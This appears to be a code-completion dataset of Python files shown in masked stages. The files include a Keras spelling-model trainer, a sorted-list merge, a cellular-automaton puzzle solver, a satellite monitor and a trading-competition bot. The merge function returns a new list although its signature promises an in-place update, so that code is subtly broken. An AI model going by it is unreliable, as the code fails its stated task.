checkpoint_filename is not None:\n model.load_weights(checkpoint_filename)\n iterate_training(model, dataset, initial_epoch)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\n 'Trains a deep spelling model.')\n parser.add_argument('--checkpoint', type=str, help=\n 'Filename of a model checkpoint to start the training from.')\n parser.add_argument('--datasetparams', type=str, help=\n 'Filename of a file with dataset params to load for continuing model training.'\n )\n parser.add_argument('--initialepoch', type=int, help=\n 'Initial epoch parameter for continuing model training.', default=0)\n args = parser.parse_args()\n main_news(args.checkpoint, args.datasetparams, args.initialepoch)\n",
"step-5": "# encoding: utf-8\n'''\nCreated on Nov 26, 2015\n\n@author: tal\n\nBased in part on:\nLearn math - https://github.com/fchollet/keras/blob/master/examples/addition_rnn.py\n\nSee https://medium.com/@majortal/deep-spelling-9ffef96a24f6#.2c9pu8nlm\n\"\"\"\n\nModified by Pavel Surmenok\n\n'''\n\nimport argparse\nimport numpy as np\nfrom keras.layers import Activation, TimeDistributed, Dense, RepeatVector, Dropout\nfrom keras.layers import recurrent\nfrom keras.models import Sequential\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, CSVLogger, LambdaCallback\nfrom numpy.random import seed as random_seed\nfrom numpy.random import randint as random_randint\nimport os\nimport pickle\n\nfrom data import DataSet\n\nrandom_seed(123) # Reproducibility\n\n# Parameters for the model and dataset\nDATASET_FILENAME = 'data/dataset/news.2011.en.shuffled'\nNUMBER_OF_EPOCHS = 100000\nRNN = recurrent.LSTM\nINPUT_LAYERS = 2\nOUTPUT_LAYERS = 2\nAMOUNT_OF_DROPOUT = 0.3\nBATCH_SIZE = 32\nSAMPLES_PER_EPOCH = 65536\nHIDDEN_SIZE = 700\nINITIALIZATION = \"he_normal\" # : Gaussian initialization scaled by fan_in (He et al., 2014)\nNUMBER_OF_CHARS = 100 # 75\nCHARS = list(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ .\")\nINVERTED = True\nMODEL_CHECKPOINT_DIRECTORYNAME = 'models'\nMODEL_CHECKPOINT_FILENAME = 'weights.{epoch:02d}-{val_loss:.2f}.hdf5'\nMODEL_DATASET_PARAMS_FILENAME = 'dataset_params.pickle'\nMODEL_STARTING_CHECKPOINT_FILENAME = 'weights.hdf5'\nCSV_LOG_FILENAME = 'log.csv'\n\n\ndef generate_model(output_len, chars=None):\n \"\"\"Generate the model\"\"\"\n print('Build model...')\n chars = chars or CHARS\n model = Sequential()\n # \"Encode\" the input sequence using an RNN, producing an output of HIDDEN_SIZE\n # note: in a situation where your input sequences have a variable length,\n # use input_shape=(None, nb_feature).\n for layer_number in range(INPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)), init=INITIALIZATION,\n return_sequences=layer_number + 1 < INPUT_LAYERS))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n # For the decoder's input, we repeat the encoded input for each time step\n model.add(RepeatVector(output_len))\n # The decoder RNN could be multiple layers stacked or a single layer\n for _ in range(OUTPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=INITIALIZATION))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n\n # For each of step of the output sequence, decide which character should be chosen\n model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))\n model.add(Activation('softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\n\nclass Colors(object):\n \"\"\"For nicer printouts\"\"\"\n ok = '\\033[92m'\n fail = '\\033[91m'\n close = '\\033[0m'\n\n\ndef show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):\n \"\"\"Selects 10 samples from the dev set at random so we can visualize errors\"\"\"\n\n for _ in range(10):\n ind = random_randint(0, len(X_dev_batch))\n row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([ind])]\n preds = model.predict_classes(row_X, verbose=0)\n q = dataset.character_table.decode(row_X[0])\n correct = dataset.character_table.decode(row_y[0])\n guess = dataset.character_table.decode(preds[0], calc_argmax=False)\n\n if INVERTED:\n print('Q', q[::-1]) # inverted back!\n else:\n print('Q', q)\n\n print('A', correct)\n print(Colors.ok + '☑' + Colors.close if correct == guess else Colors.fail + '☒' + Colors.close, guess)\n print('---')\n\n\n\ndef iterate_training(model, dataset, initial_epoch):\n \"\"\"Iterative Training\"\"\"\n\n checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' + MODEL_CHECKPOINT_FILENAME,\n save_best_only=True)\n tensorboard = TensorBoard()\n csv_logger = CSVLogger(CSV_LOG_FILENAME)\n\n X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))\n show_samples_callback = LambdaCallback(\n on_epoch_end=lambda epoch, logs: show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))\n\n train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)\n validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)\n\n model.fit_generator(train_batch_generator,\n samples_per_epoch=SAMPLES_PER_EPOCH,\n nb_epoch=NUMBER_OF_EPOCHS,\n validation_data=validation_batch_generator,\n nb_val_samples=SAMPLES_PER_EPOCH,\n callbacks=[checkpoint, tensorboard, csv_logger, show_samples_callback],\n verbose=1,\n initial_epoch=initial_epoch)\n\n\ndef save_dataset_params(dataset):\n params = { 'chars': dataset.chars, 'y_max_length': dataset.y_max_length }\n with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' + MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:\n pickle.dump(params, f)\n\n\ndef main_news(checkpoint_filename=None, dataset_params_filename=None, initial_epoch=1):\n \"\"\"Main\"\"\"\n dataset = DataSet(DATASET_FILENAME)\n\n if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):\n os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)\n\n if dataset_params_filename is not None:\n with open(dataset_params_filename, 'rb') as f:\n dataset_params = pickle.load(f)\n\n assert dataset_params['chars'] == dataset.chars\n assert dataset_params['y_max_length'] == dataset.y_max_length\n\n else:\n save_dataset_params(dataset)\n\n model = generate_model(dataset.y_max_length, dataset.chars)\n\n if checkpoint_filename is not None:\n model.load_weights(checkpoint_filename)\n\n iterate_training(model, dataset, initial_epoch)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Trains a deep spelling model.')\n parser.add_argument('--checkpoint', type=str,\n help='Filename of a model checkpoint to start the training from.')\n parser.add_argument('--datasetparams', type=str,\n help='Filename of a file with dataset params to load for continuing model training.')\n parser.add_argument('--initialepoch', type=int,\n help='Initial epoch parameter for continuing model training.', default=0)\n\n args = parser.parse_args()\n\n main_news(args.checkpoint, args.datasetparams, args.initialepoch)\n",
"step-ids": [
6,
7,
8,
10,
12
]
}
|
[
6,
7,
8,
10,
12
] |
# Classic solution for merging two sorted arrays/list to a new one.
# (Based on Merge Sort)
class Solution:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
m->Size of nums1 list
n->Size of nums2 list
"""
mergedArray = []
i = 0
j = 0
while(i < m and j < n):
if(nums1[i] <= nums2[j]):
mergedArray.append(nums1[i])
i += 1
else:
mergedArray.append(nums2[j])
j += 1
while(i < m):
mergedArray.append(nums1[i])
i += 1
while(j < n):
mergedArray.append(nums2[j])
j += 1
return mergedArray
|
normal
|
{
"blob_id": "a732e7141ffb403ca6c5d9c4204cb96c8e831aab",
"index": 6814,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) ->None:\n \"\"\"\n m->Size of nums1 list\n n->Size of nums2 list\n \"\"\"\n mergedArray = []\n i = 0\n j = 0\n while i < m and j < n:\n if nums1[i] <= nums2[j]:\n mergedArray.append(nums1[i])\n i += 1\n else:\n mergedArray.append(nums2[j])\n j += 1\n while i < m:\n mergedArray.append(nums1[i])\n i += 1\n while j < n:\n mergedArray.append(nums2[j])\n j += 1\n return mergedArray\n",
"step-4": "# Classic solution for merging two sorted arrays/list to a new one.\n# (Based on Merge Sort)\nclass Solution:\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n \"\"\"\n m->Size of nums1 list\n n->Size of nums2 list\n \"\"\"\n mergedArray = []\n i = 0 \n j = 0\n while(i < m and j < n):\n if(nums1[i] <= nums2[j]):\n mergedArray.append(nums1[i])\n i += 1\n else:\n mergedArray.append(nums2[j])\n j += 1\n while(i < m):\n mergedArray.append(nums1[i])\n i += 1\n while(j < n):\n mergedArray.append(nums2[j])\n j += 1\n return mergedArray",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Rule:
def __init__(self, template, alive):
self.template = template
self.alive = alive
def parse(string):
match = rule_regex.match(string)
if match:
template = match.group(1)
alive = match.group(2)
return Rule(template, alive)
return None
<|reserved_special_token_0|>
def apply_rule(segment, rule):
if segment == rule.template:
return rule.alive
return None
def advance(grid, rules):
augmented_grid = '.....' + grid + '.....'
grid = ['.' for x in range(0, len(augmented_grid))]
for pos in range(2, len(augmented_grid) - 2):
for rule in rules:
result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)
if result:
grid[pos] = result
first_hash = grid.index('#')
last_hash = len(grid) - 1 - grid[::-1].index('#')
offset_delta = first_hash - 5
return ''.join(grid[first_hash:last_hash + 1]), offset_delta
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Rule:
def __init__(self, template, alive):
self.template = template
self.alive = alive
def parse(string):
match = rule_regex.match(string)
if match:
template = match.group(1)
alive = match.group(2)
return Rule(template, alive)
return None
<|reserved_special_token_0|>
def apply_rule(segment, rule):
if segment == rule.template:
return rule.alive
return None
def advance(grid, rules):
augmented_grid = '.....' + grid + '.....'
grid = ['.' for x in range(0, len(augmented_grid))]
for pos in range(2, len(augmented_grid) - 2):
for rule in rules:
result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)
if result:
grid[pos] = result
first_hash = grid.index('#')
last_hash = len(grid) - 1 - grid[::-1].index('#')
offset_delta = first_hash - 5
return ''.join(grid[first_hash:last_hash + 1]), offset_delta
def find_sum(grid, offset):
sum = 0
for i in range(0, len(grid)):
if grid[i] == '#':
sum = sum + i + offset
return sum
def main():
grid, rules = read_input('./input/input.dat')
offset = 0
sum = find_sum(grid, offset)
print(grid)
for i in range(1, 1000):
new_grid, offset_delta = advance(grid, rules)
offset = offset + offset_delta
new_sum = find_sum(new_grid, offset)
sum_diff = new_sum - sum
print(i, ': grid length = ', len(new_grid), ' offset = ', offset,
' sum = ', new_sum)
if new_grid == grid:
print('found repeated grids:')
break
grid = new_grid
sum = new_sum
target_year = 50000000000
print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (
target_year - i)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Rule:
def __init__(self, template, alive):
self.template = template
self.alive = alive
def parse(string):
match = rule_regex.match(string)
if match:
template = match.group(1)
alive = match.group(2)
return Rule(template, alive)
return None
def read_input(path):
init_grid = ''
rules = []
with open(path) as infile:
cnt = 0
for line in infile:
if cnt == 0:
init_grid = grid_regex.match(line).group(1)
elif cnt > 1:
rules.append(Rule.parse(line))
cnt = cnt + 1
return init_grid, rules
def apply_rule(segment, rule):
if segment == rule.template:
return rule.alive
return None
def advance(grid, rules):
augmented_grid = '.....' + grid + '.....'
grid = ['.' for x in range(0, len(augmented_grid))]
for pos in range(2, len(augmented_grid) - 2):
for rule in rules:
result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)
if result:
grid[pos] = result
first_hash = grid.index('#')
last_hash = len(grid) - 1 - grid[::-1].index('#')
offset_delta = first_hash - 5
return ''.join(grid[first_hash:last_hash + 1]), offset_delta
def find_sum(grid, offset):
sum = 0
for i in range(0, len(grid)):
if grid[i] == '#':
sum = sum + i + offset
return sum
def main():
grid, rules = read_input('./input/input.dat')
offset = 0
sum = find_sum(grid, offset)
print(grid)
for i in range(1, 1000):
new_grid, offset_delta = advance(grid, rules)
offset = offset + offset_delta
new_sum = find_sum(new_grid, offset)
sum_diff = new_sum - sum
print(i, ': grid length = ', len(new_grid), ' offset = ', offset,
' sum = ', new_sum)
if new_grid == grid:
print('found repeated grids:')
break
grid = new_grid
sum = new_sum
target_year = 50000000000
print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (
target_year - i)))
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
rule_regex = re.compile('([\\.#]{5}) => ([\\.#])')
grid_regex = re.compile('initial state: ([\\.#]+)')
class Rule:
def __init__(self, template, alive):
self.template = template
self.alive = alive
def parse(string):
match = rule_regex.match(string)
if match:
template = match.group(1)
alive = match.group(2)
return Rule(template, alive)
return None
def read_input(path):
init_grid = ''
rules = []
with open(path) as infile:
cnt = 0
for line in infile:
if cnt == 0:
init_grid = grid_regex.match(line).group(1)
elif cnt > 1:
rules.append(Rule.parse(line))
cnt = cnt + 1
return init_grid, rules
def apply_rule(segment, rule):
if segment == rule.template:
return rule.alive
return None
def advance(grid, rules):
augmented_grid = '.....' + grid + '.....'
grid = ['.' for x in range(0, len(augmented_grid))]
for pos in range(2, len(augmented_grid) - 2):
for rule in rules:
result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)
if result:
grid[pos] = result
first_hash = grid.index('#')
last_hash = len(grid) - 1 - grid[::-1].index('#')
offset_delta = first_hash - 5
return ''.join(grid[first_hash:last_hash + 1]), offset_delta
def find_sum(grid, offset):
sum = 0
for i in range(0, len(grid)):
if grid[i] == '#':
sum = sum + i + offset
return sum
def main():
grid, rules = read_input('./input/input.dat')
offset = 0
sum = find_sum(grid, offset)
print(grid)
for i in range(1, 1000):
new_grid, offset_delta = advance(grid, rules)
offset = offset + offset_delta
new_sum = find_sum(new_grid, offset)
sum_diff = new_sum - sum
print(i, ': grid length = ', len(new_grid), ' offset = ', offset,
' sum = ', new_sum)
if new_grid == grid:
print('found repeated grids:')
break
grid = new_grid
sum = new_sum
target_year = 50000000000
print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (
target_year - i)))
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import re
rule_regex = re.compile(r'([\.#]{5}) => ([\.#])')
grid_regex = re.compile(r'initial state: ([\.#]+)')
class Rule:
def __init__(self, template, alive):
self.template = template
self.alive = alive
def parse(string):
match = rule_regex.match(string)
if match:
template = match.group(1)
alive = match.group(2)
return Rule(template, alive)
return None
def read_input(path):
init_grid = ''
rules = []
with open(path) as infile:
cnt = 0
for line in infile:
if cnt == 0:
init_grid = grid_regex.match(line).group(1)
elif cnt > 1:
rules.append(Rule.parse(line))
cnt = cnt + 1
return init_grid, rules
def apply_rule(segment, rule):
if segment == rule.template:
return rule.alive
return None
def advance(grid, rules):
augmented_grid = "....." + grid + "....."
grid = ['.' for x in range(0, len(augmented_grid))]
for pos in range(2, len(augmented_grid)-2):
for rule in rules:
result = apply_rule(augmented_grid[pos-2:pos+3], rule)
if result:
grid[pos] = result
first_hash = grid.index('#')
last_hash = len(grid) - 1 - grid[::-1].index('#')
offset_delta = first_hash-5
return ''.join(grid[first_hash:last_hash+1]), offset_delta
def find_sum(grid, offset):
sum = 0
for i in range(0,len(grid)):
if grid[i] == '#':
sum = sum + i+offset
return sum
def main():
grid, rules = read_input('./input/input.dat')
offset = 0
sum = find_sum(grid, offset)
print(grid)
for i in range(1, 1000):
new_grid, offset_delta = advance(grid, rules)
offset = offset + offset_delta
new_sum = find_sum(new_grid, offset)
sum_diff = new_sum - sum
print(i, ": grid length = ", len(new_grid), " offset = ", offset, " sum = ", new_sum)
if new_grid == grid:
print("found repeated grids:")
break
grid = new_grid
sum = new_sum
target_year = 50000000000
print("sum at {} = {}".format(target_year, new_sum + sum_diff*(target_year-i)))
if __name__== "__main__":
main()
|
flexible
|
{
"blob_id": "8c683c109aba69f296b8989915b1f3b3eecd9745",
"index": 4274,
"step-1": "<mask token>\n\n\nclass Rule:\n\n def __init__(self, template, alive):\n self.template = template\n self.alive = alive\n\n def parse(string):\n match = rule_regex.match(string)\n if match:\n template = match.group(1)\n alive = match.group(2)\n return Rule(template, alive)\n return None\n\n\n<mask token>\n\n\ndef apply_rule(segment, rule):\n if segment == rule.template:\n return rule.alive\n return None\n\n\ndef advance(grid, rules):\n augmented_grid = '.....' + grid + '.....'\n grid = ['.' for x in range(0, len(augmented_grid))]\n for pos in range(2, len(augmented_grid) - 2):\n for rule in rules:\n result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)\n if result:\n grid[pos] = result\n first_hash = grid.index('#')\n last_hash = len(grid) - 1 - grid[::-1].index('#')\n offset_delta = first_hash - 5\n return ''.join(grid[first_hash:last_hash + 1]), offset_delta\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Rule:\n\n def __init__(self, template, alive):\n self.template = template\n self.alive = alive\n\n def parse(string):\n match = rule_regex.match(string)\n if match:\n template = match.group(1)\n alive = match.group(2)\n return Rule(template, alive)\n return None\n\n\n<mask token>\n\n\ndef apply_rule(segment, rule):\n if segment == rule.template:\n return rule.alive\n return None\n\n\ndef advance(grid, rules):\n augmented_grid = '.....' + grid + '.....'\n grid = ['.' for x in range(0, len(augmented_grid))]\n for pos in range(2, len(augmented_grid) - 2):\n for rule in rules:\n result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)\n if result:\n grid[pos] = result\n first_hash = grid.index('#')\n last_hash = len(grid) - 1 - grid[::-1].index('#')\n offset_delta = first_hash - 5\n return ''.join(grid[first_hash:last_hash + 1]), offset_delta\n\n\ndef find_sum(grid, offset):\n sum = 0\n for i in range(0, len(grid)):\n if grid[i] == '#':\n sum = sum + i + offset\n return sum\n\n\ndef main():\n grid, rules = read_input('./input/input.dat')\n offset = 0\n sum = find_sum(grid, offset)\n print(grid)\n for i in range(1, 1000):\n new_grid, offset_delta = advance(grid, rules)\n offset = offset + offset_delta\n new_sum = find_sum(new_grid, offset)\n sum_diff = new_sum - sum\n print(i, ': grid length = ', len(new_grid), ' offset = ', offset,\n ' sum = ', new_sum)\n if new_grid == grid:\n print('found repeated grids:')\n break\n grid = new_grid\n sum = new_sum\n target_year = 50000000000\n print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (\n target_year - i)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Rule:\n\n def __init__(self, template, alive):\n self.template = template\n self.alive = alive\n\n def parse(string):\n match = rule_regex.match(string)\n if match:\n template = match.group(1)\n alive = match.group(2)\n return Rule(template, alive)\n return None\n\n\ndef read_input(path):\n init_grid = ''\n rules = []\n with open(path) as infile:\n cnt = 0\n for line in infile:\n if cnt == 0:\n init_grid = grid_regex.match(line).group(1)\n elif cnt > 1:\n rules.append(Rule.parse(line))\n cnt = cnt + 1\n return init_grid, rules\n\n\ndef apply_rule(segment, rule):\n if segment == rule.template:\n return rule.alive\n return None\n\n\ndef advance(grid, rules):\n augmented_grid = '.....' + grid + '.....'\n grid = ['.' for x in range(0, len(augmented_grid))]\n for pos in range(2, len(augmented_grid) - 2):\n for rule in rules:\n result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)\n if result:\n grid[pos] = result\n first_hash = grid.index('#')\n last_hash = len(grid) - 1 - grid[::-1].index('#')\n offset_delta = first_hash - 5\n return ''.join(grid[first_hash:last_hash + 1]), offset_delta\n\n\ndef find_sum(grid, offset):\n sum = 0\n for i in range(0, len(grid)):\n if grid[i] == '#':\n sum = sum + i + offset\n return sum\n\n\ndef main():\n grid, rules = read_input('./input/input.dat')\n offset = 0\n sum = find_sum(grid, offset)\n print(grid)\n for i in range(1, 1000):\n new_grid, offset_delta = advance(grid, rules)\n offset = offset + offset_delta\n new_sum = find_sum(new_grid, offset)\n sum_diff = new_sum - sum\n print(i, ': grid length = ', len(new_grid), ' offset = ', offset,\n ' sum = ', new_sum)\n if new_grid == grid:\n print('found repeated grids:')\n break\n grid = new_grid\n sum = new_sum\n target_year = 50000000000\n print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (\n target_year - i)))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nrule_regex = re.compile('([\\\\.#]{5}) => ([\\\\.#])')\ngrid_regex = re.compile('initial state: ([\\\\.#]+)')\n\n\nclass Rule:\n\n def __init__(self, template, alive):\n self.template = template\n self.alive = alive\n\n def parse(string):\n match = rule_regex.match(string)\n if match:\n template = match.group(1)\n alive = match.group(2)\n return Rule(template, alive)\n return None\n\n\ndef read_input(path):\n init_grid = ''\n rules = []\n with open(path) as infile:\n cnt = 0\n for line in infile:\n if cnt == 0:\n init_grid = grid_regex.match(line).group(1)\n elif cnt > 1:\n rules.append(Rule.parse(line))\n cnt = cnt + 1\n return init_grid, rules\n\n\ndef apply_rule(segment, rule):\n if segment == rule.template:\n return rule.alive\n return None\n\n\ndef advance(grid, rules):\n augmented_grid = '.....' + grid + '.....'\n grid = ['.' for x in range(0, len(augmented_grid))]\n for pos in range(2, len(augmented_grid) - 2):\n for rule in rules:\n result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)\n if result:\n grid[pos] = result\n first_hash = grid.index('#')\n last_hash = len(grid) - 1 - grid[::-1].index('#')\n offset_delta = first_hash - 5\n return ''.join(grid[first_hash:last_hash + 1]), offset_delta\n\n\ndef find_sum(grid, offset):\n sum = 0\n for i in range(0, len(grid)):\n if grid[i] == '#':\n sum = sum + i + offset\n return sum\n\n\ndef main():\n grid, rules = read_input('./input/input.dat')\n offset = 0\n sum = find_sum(grid, offset)\n print(grid)\n for i in range(1, 1000):\n new_grid, offset_delta = advance(grid, rules)\n offset = offset + offset_delta\n new_sum = find_sum(new_grid, offset)\n sum_diff = new_sum - sum\n print(i, ': grid length = ', len(new_grid), ' offset = ', offset,\n ' sum = ', new_sum)\n if new_grid == grid:\n print('found repeated grids:')\n break\n grid = new_grid\n sum = new_sum\n target_year = 50000000000\n print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (\n target_year - i)))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import re\n\nrule_regex = re.compile(r'([\\.#]{5}) => ([\\.#])')\ngrid_regex = re.compile(r'initial state: ([\\.#]+)')\n\n\nclass Rule:\n def __init__(self, template, alive):\n self.template = template\n self.alive = alive\n\n def parse(string):\n match = rule_regex.match(string)\n if match:\n template = match.group(1)\n alive = match.group(2)\n return Rule(template, alive)\n return None\n\n\ndef read_input(path):\n init_grid = ''\n rules = []\n with open(path) as infile:\n cnt = 0\n for line in infile:\n if cnt == 0:\n init_grid = grid_regex.match(line).group(1)\n elif cnt > 1:\n rules.append(Rule.parse(line))\n cnt = cnt + 1\n return init_grid, rules\n\n\ndef apply_rule(segment, rule):\n if segment == rule.template:\n return rule.alive\n return None\n\n\ndef advance(grid, rules):\n augmented_grid = \".....\" + grid + \".....\"\n grid = ['.' for x in range(0, len(augmented_grid))]\n for pos in range(2, len(augmented_grid)-2):\n for rule in rules:\n result = apply_rule(augmented_grid[pos-2:pos+3], rule) \n if result:\n grid[pos] = result\n\n first_hash = grid.index('#')\n last_hash = len(grid) - 1 - grid[::-1].index('#')\n offset_delta = first_hash-5\n\n return ''.join(grid[first_hash:last_hash+1]), offset_delta\n\n\ndef find_sum(grid, offset):\n sum = 0\n for i in range(0,len(grid)):\n if grid[i] == '#':\n sum = sum + i+offset\n return sum\n\n\ndef main():\n grid, rules = read_input('./input/input.dat')\n offset = 0\n sum = find_sum(grid, offset)\n print(grid)\n\n for i in range(1, 1000):\n new_grid, offset_delta = advance(grid, rules)\n offset = offset + offset_delta\n new_sum = find_sum(new_grid, offset)\n sum_diff = new_sum - sum\n print(i, \": grid length = \", len(new_grid), \" offset = \", offset, \" sum = \", new_sum)\n if new_grid == grid:\n print(\"found repeated grids:\")\n break\n grid = new_grid\n sum = new_sum\n\n\n target_year = 50000000000\n\n print(\"sum at {} = {}\".format(target_year, new_sum + sum_diff*(target_year-i)))\n \n \n\nif __name__== \"__main__\":\n main()\n",
"step-ids": [
5,
7,
9,
10,
12
]
}
|
[
5,
7,
9,
10,
12
] |
# -*- coding: utf-8 -*-
from LibTools.filesystem import Carpeta
from slaves import SentinelSat
import settings
if __name__ == '__main__':
carpeta = Carpeta(settings.folder_sat)
sentinela = SentinelSat(carpeta)
sentinela.start_Monitoring()
|
normal
|
{
"blob_id": "9e3f4484542c2629d636fcb4166584ba52bebe21",
"index": 2196,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n carpeta = Carpeta(settings.folder_sat)\n sentinela = SentinelSat(carpeta)\n sentinela.start_Monitoring()\n",
"step-3": "from LibTools.filesystem import Carpeta\nfrom slaves import SentinelSat\nimport settings\nif __name__ == '__main__':\n carpeta = Carpeta(settings.folder_sat)\n sentinela = SentinelSat(carpeta)\n sentinela.start_Monitoring()\n",
"step-4": "# -*- coding: utf-8 -*-\nfrom LibTools.filesystem import Carpeta\nfrom slaves import SentinelSat\n\nimport settings\n\nif __name__ == '__main__':\n\n carpeta = Carpeta(settings.folder_sat)\n sentinela = SentinelSat(carpeta)\n sentinela.start_Monitoring()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write('\n')
<|reserved_special_token_0|>
def hello():
write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})
def add(symbol, direction, price, size):
global orders_placed
orders_placed += 1
global pending_orders
pending_orders.append(orders_placed)
print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(
positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +
' Symbol: ' + symbol + ' Price: ' + str(price) + '')
if direction == 'BUY':
global pending_buy_orders
pending_buy_orders[symbol] += size
elif direction == 'SELL':
global pending_sell_orders
pending_sell_orders[symbol] += size
write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,
'symbol': symbol, 'dir': direction, 'price': price, 'size': size})
read_from_exchange(exchange)
<|reserved_special_token_0|>
def buy_sell_xlf():
if xlf_buy > 0 and xlf_sell > 0:
global pending_sell_orders
global pending_buy_orders
if pending_buy_orders['XLF'] + positions['XLF'] < 100:
global xlf_buy_pending_id
if xlf_buy_pending_id:
cancel(xlf_buy_pending_id)
pending_buy_orders['XLF'] = 0
xlf_buy_pending_id = None
print('Cancel XLF Order: ' + str(orders_placed))
time.sleep(1)
add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])
xlf_buy_pending_id = orders_placed
elif positions['XLF'] - pending_sell_orders['XLF'] > -100:
global xlf_sell_pending_id
if xlf_sell_pending_id:
print('Cancel XLF Order: ' + str(orders_placed))
cancel(xlf_sell_pending_id)
pending_sell_orders['XLF'] = 0
xlf_sell_pending_id = None
time.sleep(1)
add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])
xlf_sell_pending_id = orders_placed
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write('\n')
def read_from_exchange(exchange):
return json.loads(exchange.readline())
<|reserved_special_token_0|>
def hello():
write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})
def add(symbol, direction, price, size):
global orders_placed
orders_placed += 1
global pending_orders
pending_orders.append(orders_placed)
print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(
positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +
' Symbol: ' + symbol + ' Price: ' + str(price) + '')
if direction == 'BUY':
global pending_buy_orders
pending_buy_orders[symbol] += size
elif direction == 'SELL':
global pending_sell_orders
pending_sell_orders[symbol] += size
write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,
'symbol': symbol, 'dir': direction, 'price': price, 'size': size})
read_from_exchange(exchange)
def cancel(order_id):
write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})
def listen_for_fills(server_msg):
if server_msg['type'] == 'fill':
order_num = server_msg['order_id']
symbol = server_msg['symbol']
size = server_msg['size']
direction = server_msg['dir']
global positions
if symbol == 'BOND':
if direction == 'BUY':
pending_buy_orders[symbol] -= size
add('BOND', 'SELL', 1001, size)
elif direction == 'SELL':
pending_sell_orders[symbol] -= size
add('BOND', 'BUY', 999, size)
if symbol == 'VALE':
print('Vale Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['VALE'] += size
elif direction == 'SELL':
positions['VALE'] -= size
pending_sell_orders[symbol] -= size
if symbol == 'XLF':
print('XLF Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['XLF'] += size
elif direction == 'SELL':
positions['XLF'] -= size
pending_sell_orders[symbol] -= size
<|reserved_special_token_0|>
def buy_sell_xlf():
if xlf_buy > 0 and xlf_sell > 0:
global pending_sell_orders
global pending_buy_orders
if pending_buy_orders['XLF'] + positions['XLF'] < 100:
global xlf_buy_pending_id
if xlf_buy_pending_id:
cancel(xlf_buy_pending_id)
pending_buy_orders['XLF'] = 0
xlf_buy_pending_id = None
print('Cancel XLF Order: ' + str(orders_placed))
time.sleep(1)
add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])
xlf_buy_pending_id = orders_placed
